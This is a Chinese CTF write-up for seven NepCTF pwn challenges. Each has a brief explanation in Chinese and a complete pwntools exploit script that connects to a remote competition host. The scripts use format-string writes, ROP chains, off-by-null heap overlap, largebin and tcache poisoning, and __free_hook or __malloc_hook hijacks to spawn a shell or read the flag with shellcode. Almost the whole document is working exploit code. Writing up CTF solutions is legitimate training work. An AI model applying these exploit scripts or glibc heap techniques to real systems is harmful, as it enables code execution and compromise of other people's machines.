nepctf-pwn

题解

xhh:

劫持堆上的函数指针为后门函数以此来getshell

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
context.log_level = 'debug'

binary = 'xhh'
elf = ELF('xhh')
libc = elf.libc
context.binary = binary

DEBUG = 1
if DEBUG:
  p = process(binary)
else:
  host = "node2.hackingfor.fun"
  port =  35467 
  p = remote(host,port)
if DEBUG == 2:
  host = ""
  port = 0
  user = ""
  passwd = ""
  p = ssh(host,port,user,passwd)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
payload = "a"*0x10+p8(0xe5)
# p.recv()
# gdb.attach(p)
sleep(0.01)
p.send(payload)
p.interactive()
easypwn

格式化字符串漏洞,修改rbp一字节为0,在后面leave_ret的时候会进行转移,在上面和下面放置上ropchain,在转移的时候有一定几率会撞到我们的ropchain,从而完成attack

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
context.log_level = 'debug'
binary = 'easypwn'
elf = ELF('easypwn')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
else:
  host = "node2.hackingfor.fun"
  port =  36610
  p = remote(host,port)
if DEBUG == 2:
  host = ""
  port = 0
  user = ""
  passwd = ""
  p = ssh(host,port,user,passwd)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
poprdi = 0x0000000000400be3
poprbp = 0x00000000004007c8
poprsi = 0x0000000000400be1
leaver = 0x0000000000400a1f
payload =  p64(poprdi)+p64(0)+p64(poprsi)+p64(elf.bss()+0x300)
payload += p64(0)+p64(elf.plt["read"])+p64(poprbp)+p64(elf.bss()+0x300-0x8)
payload += p64(leaver)
payload1 = ""
# payload = ""
# for i in range(9):
#   payload += p64(0x602120+i)
# payload = p64(0x602120)*9
payload1 = p64(poprbp)*4+p64(0x6020C0-0x8)+p64(leaver)
# payload1 = p64(0x6020c0)*0x6
p.recv()
p.send(payload)
p.recv()
p.send("%22$hhn")
p.recv()
# gdb.attach(p,"""
#   b snprintf
#   b *0x400a1e
#   b *0x04007c8
#   """)
# pause()
p.send(payload1)
sleep(0.01)
payload = p64(poprdi)+p64(elf.got["puts"])+p64(elf.plt["puts"])
payload += p64(poprdi)+p64(0)+p64(poprsi)+p64(elf.bss()+0x200)
payload += p64(0)+p64(elf.plt["read"])
payload += p64(poprbp)+p64(elf.bss()+0x200-0x8)+p64(leaver)

# gdb.attach(p,"b *0x0000000000400be3")
p.sendline(payload)
sleep(0.01)
libc_base = l64()-libc.sym["puts"]
lg("libc_base",libc_base)
poprax = 0x0000000000043ae8+libc_base
poprsi = 0x0000000000023eea+libc_base
poprdx = 0x0000000000001b96+libc_base
syscall_ret = libc_base+0x00000000000d2745
sh_addr = libc_base+libc.search("/bin/sh\x00").next()
payload = p64(poprdi)+p64(sh_addr)+p64(poprsi)+p64(0)
payload += p64(poprdx)+p64(0)+p64(poprax)+p64(59)+p64(syscall_ret)

p.sendline(payload)
p.interactive()
easystack

栈溢出,覆盖argv[0]为flag的地址,故意触发canary从而输出flag

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
context.log_level = 'debug'

binary = 'easystack'
elf = ELF('easystack')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
else:
  host = "node2.hackingfor.fun"
  port =  32356
  p = remote(host,port)
if DEBUG == 2:
  host = ""
  port = 0
  user = ""
  passwd = ""
  p = ssh(host,port,user,passwd)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
payload = p64(0x6cde20)*100
# p.recv()
# gdb.attach(p,"b *0x400A47")
p.sendline(payload)
p.interactive()
superpower

格式化字符串漏洞,通过调试分析可以知道fclose会调用free,因此劫持free_hook为system,同时劫持free在堆上的参数为sh来getshell

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
context.log_level = 'debug'

binary = 'superpower'
elf = ELF('superpower')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
else:
  host = "node2.hackingfor.fun"
  port =  39964 
  p = remote(host,port)
if DEBUG == 2:
  host = ""
  port = 0
  user = ""
  passwd = ""
  p = ssh(host,port,user,passwd)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
p.recv()
p.sendline("/proc/self/maps")
ru("superpower\n")
ru("superpower\n")
ru("superpower\n")
# ru("superpower\n")
heap_addr = int(ru("-")[:-1],16)
lg("heap_addr",heap_addr)

libc_base = ru("heap]\n")
libc_base = int(ru('-')[:-1],16)+0x1000
lg("libc_base",libc_base)
sys_addr = libc_base+libc.sym["system"]
"""
0x3a81c execve("/bin/sh", esp+0x28, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x28] == NULL

0x3a81e execve("/bin/sh", esp+0x2c, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x2c] == NULL

0x3a822 execve("/bin/sh", esp+0x30, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x30] == NULL

0x3a829 execve("/bin/sh", esp+0x34, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x34] == NULL

0x5f075 execl("/bin/sh", eax)
constraints:
  esi is the GOT address of libc
  eax == NULL

0x5f076 execl("/bin/sh", [esp])
constraints:
  esi is the GOT address of libc
  [esp] == NULL
"""
one = libc_base+0x3a81c
one = 0x8048754
one = libc_base+libc.sym["system"]
lg("one",one)
o1 = one & 0xffff
o2 = one >> 16
sh = 0x6873
lg("o1",o1)
lg("o2",o2)
lg("sh",sh)
# if sh > o2:
# # payload = "aaa"
#   payload = "%{}c%35$hn".format(o2)
#   payload = "%{}c%2$hn".format(sh-o2)
#   payload += "%{}c%36$hn".format(o1-sh)
#   payload = payload.ljust(0x20,"a")
#   payload += p32(libc_base+libc.sym["__free_hook"])
#   payload += p32(libc_base+libc.sym["__free_hook"]+0x2)
# else:
payload = "%{}c%39$n".format(sh)
# payload = "%{}c%39$hn".format(sh)
payload += "%{}c%40$hn".format(o1-sh)
payload += "%{}c%41$hn".format(o2-o1)
payload = payload.ljust(0x30,"a")
payload += p32(heap_addr+0x168)
payload += p32(libc_base+libc.sym["__free_hook"])
payload += p32(libc_base+libc.sym["__free_hook"]+0x2)
print payload
p.recv()
# gdb.attach(p,"b *0x080487B8")
p.sendline(payload)
p.interactive()
scmt

格式化字符串漏洞,泄露随机数来getshell

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
#context.log_level = 'debug'

binary = 'scmt'
elf = ELF('scmt')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
else:
  host = "node2.hackingfor.fun"
  port =  39601
  p = remote(host,port)
if DEBUG == 2:
  host = ""
  port = 0
  user = ""
  passwd = ""
  p = ssh(host,port,user,passwd)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
p.recv()
p.sendline("%8$p")
ru("0x")
code1 = int(ru('\n')[:-1],16)
lg("code1",code1)
p.recv()
# gdb.attach(p)
p.sendline(str(code1))
p.interactive()
NULL_FXCK

off by null漏洞,用堆风水来制造chunk_overlapping,泄露出libc,largebin attack劫持tls结构体里面存放的tcache_entry地址,来实现将tcache_entry转移从而使tcache_entry可控,造成任意地址申请原语,然后伪造一个chunk链,链上有三个chunk,chunk1->chunk2(存放codebase的address)->codebase,当我们把chunk1和chunk2申请下来的以后bins上会剩下两次key加密的codebase,然后我们此时free一个堆重叠过且size相同的堆块即可通过show来泄露出codebase,泄露出codebase以后便可以劫持bss段上存放数组指针的地址,然后就可以为所欲为,这里我选择的是劫持的栈来进行rop

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
# context.log_level = 'debug'

binary = 'fxck'
elf = ELF('fxck')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
else:
  host = "node2.hackingfor.fun"
  port =  30597 
  p = remote(host,port)
if DEBUG == 2:
  host = ""
  port = 0
  user = ""
  passwd = ""
  p = ssh(host,port,user,passwd)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
def cmd(idx):
    sla(">> ",str(idx))
def add(size,payload = ""):
    cmd(1)
    sla("Size: ",str(size))
    if payload:
        sa("tent: ",payload)
    else:
        sa("tent: ","aaa")
def free(idx):
    cmd(3)
    sla("dex: ",str(idx))
def show(idx):
    cmd(4)
    sla("dex: ",str(idx))
def edit(idx,payload):
    cmd(2)
    sla("dex: ",str(idx))
    sa("tent: ",payload)
def addWhere(addr,payload):
    free(4)
    add(0x520,"a"*0x20+p64(0)+p64(0x4a1)+p64(0)*9+p64(0x0001000000000000)+"\x00"*0x198+p64(addr)+'\x00'*0x100)
    add(0x300,payload)
def largebinAttack(addr):
    free(4)
    add(0x520,"a"*0x20+p64(0)+p64(0x4a1)+p64(0)*3+p64(addr-0x20))
    free(8)
    add(0x478)

add(0x148) #0   
add(0x4f8) #1
add(0x1f8) #2

add(0x4f8) #3
add(0x4f8) #4
add(0x4f8) #5
add(0x4f8) #6

add(0x4f8) #7
add(0x4f8) #8
add(0x4f8) #9
add(0x4f8) #10

free(6)
free(4)
free(8)
free(3)
add(0x528,"a"*0x4f0+p64(0)+p64(0xa00))#3
add(0x4c0)#4
add(0x4f0)#6
add(0x4f0)#8
free(4)
free(5)
add(0x4f0)#4
add(0x4c8)
free(8)
free(4)
free(6)
add(0x4f0,"a"*0x9)#4
add(0x4f0)#6
add(0x4f0)#8
free(6)
free(8)
free(7)
add(0x520,"a"*0x4f0+p64(0)+p64(0x501)+"a")#6
add(0x4c8)#8
add(0x4f0)#7
edit(5,"a"*0x4c0+p64(0xa00))
free(4)
add(0x520)
add(0x1000)
show(5)
libc_base = l64()-0x1e4160
lg("libc_base",libc_base)
add(0x1f8)
add(0x7c0)
free(5)
show(12)
key = u64(p.recv(5).ljust(8,"\x00"))
lg("key",key)
add(0x1f8)
free_hook1 = libc.sym["__free_hook"]+libc_base&0xfffffffffffff000
free(4)
add(0x520,"a"*0x20+p64(0)+p64(0x4a1)+"a"*0x490+p64(0)+p64(0x21)*7)
free(13)
add(0x480,'aa')
poprdi = 0x000000000002858f+libc_base
leaver = 0x000000000005591c+libc_base
poprsi = 0x000000000002ac3f+libc_base
pop2r = 0x00000000001597d6+libc_base
poprax = 0x0000000000045580+libc_base
syscall = 0x00000000000611ea+libc_base
poprdx = 0x0000000000114161+libc_base
poprsp = 0x000000000003418a+libc_base
add(0x358+0x20-0x40,p64(0)+p64(pop2r)+p64(free_hook1)+p64(0)+p64(leaver)+p64(poprdi)+p64(0)+p64(poprax)+p64(0)+p64(poprdx)+p64(0x1000)+p64(syscall)+p64(poprsp)+p64(free_hook1))
free(8)
free(4)
add(0x520,"a"*0x20+p64(0)+p64(0x4a1)+p64(0)*3+p64(0x1eb538+libc_base-0x20))
free(13)
#chunk 8
add(0x478,p64(0)*9+p64(0x0001000000000000)+"\x00"*0x198+p64(libc_base+libc.sym["__free_hook"])+'\x00'*0x100)
free(4)
add(0x520,"a"*0x20+p64(0)+p64(0x4a1)+p64(0)*9+p64(0x0001000000000000)+"\x00"*0x198+p64(libc_base+0x1e7600+0x20)+'\x00'*0x100)
#chunk 13
add(0x300,p8(0))
free(4)
add(0x520,"a"*0x20+p64(0)+p64(0x4a1)+p64(0)*3+p64(0x1e7600+0x20+libc_base-0x20))
free(8)
add(0x478)
# free(4)
# add(0x520,"a"*0x20+p64(0)+p64(0x4a1))
show(13)
heap_addr = u64(p.recv(6).ljust(8,"\x00"))
lg("heap_addr",heap_addr)
addr = libc_base+0x21c1e0
free(4)
add(0x520,"a"*0x20+p64(0)+p64(0x4a1)+p64(0)*9+p64(0x0001000000000000)+"\x00"*0x198+p64(heap_addr+0x10)+'\x00'*0x100)
add(0x300,p64(0)*2)
free(4)
add(0x520,"a"*0x20+p64(0)+p64(0x311)+p64(addr^key)+p64(0)*8+p64(0x0004000000000000)+"\x00"*0x198+p64(heap_addr+0x10)+'\x00'*0x100)
add(0x300,"a")
add(0x300,"a")
free(15)
show(16)
key2 = addr >> 12
bss_addr = u64(p.recv(6).ljust(8,"\x00")) ^key^key2
bss_addr = bss_addr+0x4020
lg("bss_addr",bss_addr)
free(4)
add(0x520,"a"*0x20+p64(0)+p64(0x311)+p64(0)*9+p64(0x0001000000000000)+"\x00"*0x198+p64(bss_addr+0x140)+'\x00'*0x100)
add(0x300,p64(libc_base+libc.sym["environ"]))
show(0)
stack_addr = l64()
lg("stack_addr",stack_addr)
free(4)
add(0x520,"a"*0x20+p64(0)+p64(0x4a1)+p64(0)*9+p64(0x0001000000000000)+"\x00"*0x198+p64(stack_addr-0x148)+'\x00'*0x100)
payload = p64(poprsi)*2+p64(free_hook1)+p64(poprdi)+p64(0)+p64(poprax)+p64(0)+p64(poprdx)+p64(0x1000)*2+p64(syscall)+p64(poprsp)+p64(free_hook1)
add(0x300,payload)
payload = [poprdi,free_hook1,poprsi,0x2000,poprdx,0x7,0x7,poprax,10,syscall,free_hook1+0x70]
sc = shellcraft.open("./flag.txt",0)
sc += shellcraft.read("rax",free_hook1+0x300,0x100)
sc += shellcraft.write(1,free_hook1+0x300,0x100)
p.sendline(flat(payload).ljust(0x70,"\x90")+asm(sc))
# gdb.attach(p)
p.interactive()
sooooeasy

glibc2.23 uaf没有show,劫持stdout泄露libc然后劫持malloc_hook 用libc_realloc来调整栈帧

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#__Author__ = Cnitlrt
context.log_level = 'debug'

binary = 'sooooeasy'
elf = ELF('sooooeasy')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
else:
  host = "node2.hackingfor.fun"
  port =  30226
  p = remote(host,port)
if DEBUG == 2:
  host = ""
  port = 0
  user = ""
  passwd = ""
  p = ssh(host,port,user,passwd)
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
def cmd(idx):
    sla("choice : ",str(idx))
def add(size,name,message = ""):
    cmd(1)
    sla("your name: \n",str(size))
    sa("name:\n",name)
    if message:
        sla("message:\n",message)
    else:
        sla("message:\n","aaa")
def free(idx):
    cmd(2)
    sla("index:\n",str(idx))
add(0x68,"aaa")
add(0x90,'aaa')
add(0x68,"aaa")
add(0x68,"aaa")
free(1)
add(0x68,p16(0x2620-0x43))
free(0)
free(2)
free(0)
add(0x68,p8(0x0))
add(0x68,p8(0x0))
add(0x68,p8(0x0))
add(0x68,p8(0x0))
cmd(1)
sla("your name: \n",str(0x60))
sa("name:\n","a"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0x88))
# add(0x60,"a"*0x33+p64(0xfbad1887)+p64(0)*3+p8(0x88))
libc_base = l64()-libc.sym["_IO_2_1_stdin_"]
lg("libc_base",libc_base)
sla("message:\n","aaa")
malloc_hook = libc_base+libc.sym["__malloc_hook"]
free(0)
free(3)
free(0)
add(0x68,p64(malloc_hook-0x23))
add(0x68,p64(malloc_hook-0x23))
"""
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf0364 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1207 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
"""
add(0x68,p64(malloc_hook-0x23))
add(0x68,"a"*(0x13-0x8)+p64(0xf1207+libc_base)+p64(libc_base+libc.sym["__libc_realloc"]+0x4))
# add(0x38,p16(0x2620))
cmd(1)
# gdb.attach(p)
p.interactive()

你可能感兴趣的:(nepctf-pwn)